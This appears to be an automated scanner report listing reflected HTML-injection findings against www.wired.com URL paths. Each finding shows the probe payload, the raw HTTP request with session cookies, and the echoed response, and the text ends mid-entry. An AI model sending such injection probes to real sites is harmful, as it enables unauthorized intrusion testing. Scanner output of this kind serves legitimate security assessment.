HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29268 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:15:57 GMT Date: Mon, 22 Nov 2010 01:11:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_multimediaaf2cd"><a>0b4232b1240"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e1b5"><a>d5da876dbe0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /multimedia3e1b5"><a>d5da876dbe0/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29269 Vary: Accept-Encoding Cache-Control: max-age=236 Expires: Sun, 21 Nov 2010 20:19:58 GMT Date: Sun, 21 Nov 2010 20:16:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_multimedia3e1b5"><a>d5da876dbe0"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88eb2"><a>01f8e05d095 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /news/archive88eb2"><a>01f8e05d095/2010-01/15/javascript-hack-enables-flash-on-iphone HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29401 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 22 Nov 2010 01:21:53 GMT Date: Mon, 22 Nov 2010 01:11:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_news ss_archive88eb2"><a>01f8e05d095 c_2010-01"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e94db"><a>4cebf2d1561 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /news/archive/2010-01e94db"><a>4cebf2d1561/15/javascript-hack-enables-flash-on-iphone HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29401 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 22 Nov 2010 01:22:18 GMT Date: Mon, 22 Nov 2010 01:12:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_news ss_archive c_2010-01e94db"><a>4cebf2d1561"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c427d"><a>e6d5b4a7516 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /politicsc427d"><a>e6d5b4a7516 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29299 Vary: Accept-Encoding Cache-Control: max-age=239 Expires: Mon, 22 Nov 2010 01:15:40 GMT Date: Mon, 22 Nov 2010 01:11:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_politicsc427d"><a>e6d5b4a7516"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70abd"><a>9d24c849cc4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /politics70abd"><a>9d24c849cc4/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29300 Vary: Accept-Encoding Cache-Control: max-age=233 Expires: Sun, 21 Nov 2010 20:20:15 GMT Date: Sun, 21 Nov 2010 20:16:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_politics70abd"><a>9d24c849cc4"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 209da"><a>9d347d00209 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /politics209da"><a>9d347d00209/law HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29310 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:13:03 GMT Date: Sun, 21 Nov 2010 23:09:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_politics209da"><a>9d347d00209 ss_law"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d82c1"><a>05b6fbcb3c6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /politics/lawd82c1"><a>05b6fbcb3c6 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29310 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:19:31 GMT Date: Sun, 21 Nov 2010 23:09:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_politics ss_lawd82c1"><a>05b6fbcb3c6"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 623f2"><a>92180a2ca9b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /politics623f2"><a>92180a2ca9b/onlinerights HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29328 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:13:05 GMT Date: Sun, 21 Nov 2010 23:09:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_politics623f2"><a>92180a2ca9b ss_onlinerights"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ecce"><a>b1a59a8a533 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /politics/onlinerights3ecce"><a>b1a59a8a533 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29328 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:19:32 GMT Date: Sun, 21 Nov 2010 23:09:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_politics ss_onlinerights3ecce"><a>b1a59a8a533"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5482e"><a>d19474f130 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /politics5482e"><a>d19474f130/security HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29318 Vary: Accept-Encoding Cache-Control: max-age=229 Expires: Sun, 21 Nov 2010 23:12:58 GMT Date: Sun, 21 Nov 2010 23:09:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_politics5482e"><a>d19474f130 ss_security"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f2a3"><a>f519379c247 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /politics/security5f2a3"><a>f519379c247 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29320 Vary: Accept-Encoding Cache-Control: max-age=555 Expires: Sun, 21 Nov 2010 23:18:52 GMT Date: Sun, 21 Nov 2010 23:09:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_politics ss_security5f2a3"><a>f519379c247"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da50c"><a>af7f20fae3a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /scienceda50c"><a>af7f20fae3a HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29259 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:15:42 GMT Date: Mon, 22 Nov 2010 01:11:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_scienceda50c"><a>af7f20fae3a"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fb46"><a>7e95b9b5c37 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science8fb46"><a>7e95b9b5c37/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29260 Vary: Accept-Encoding Cache-Control: max-age=223 Expires: Sun, 21 Nov 2010 20:03:06 GMT Date: Sun, 21 Nov 2010 19:59:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science8fb46"><a>7e95b9b5c37"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96ddf"><a>cdde2cce323 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science96ddf"><a>cdde2cce323/discoveries HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29286 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:13:10 GMT Date: Sun, 21 Nov 2010 23:09:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science96ddf"><a>cdde2cce323 ss_discoveries"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38394"><a>ab4904fcd7d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries38394"><a>ab4904fcd7d HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29286 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:19:35 GMT Date: Sun, 21 Nov 2010 23:09:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries38394"><a>ab4904fcd7d"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbd1d"><a>538a6317253 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /sciencecbd1d"><a>538a6317253/discoveries/news/1999/09/31631 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29312 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:55 GMT Date: Sun, 21 Nov 2010 23:12:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_sciencecbd1d"><a>538a6317253 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3da6c"><a>360db666dd0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries3da6c"><a>360db666dd0/news/1999/09/31631 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29312 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:23:13 GMT Date: Sun, 21 Nov 2010 23:13:13 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries3da6c"><a>360db666dd0 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a30c"><a>b820a999ffb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news3a30c"><a>b820a999ffb/1999/09/31631 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29312 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:23:25 GMT Date: Sun, 21 Nov 2010 23:13:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news3a30c"><a>b820a999ffb"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2189"><a>e200d456324 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
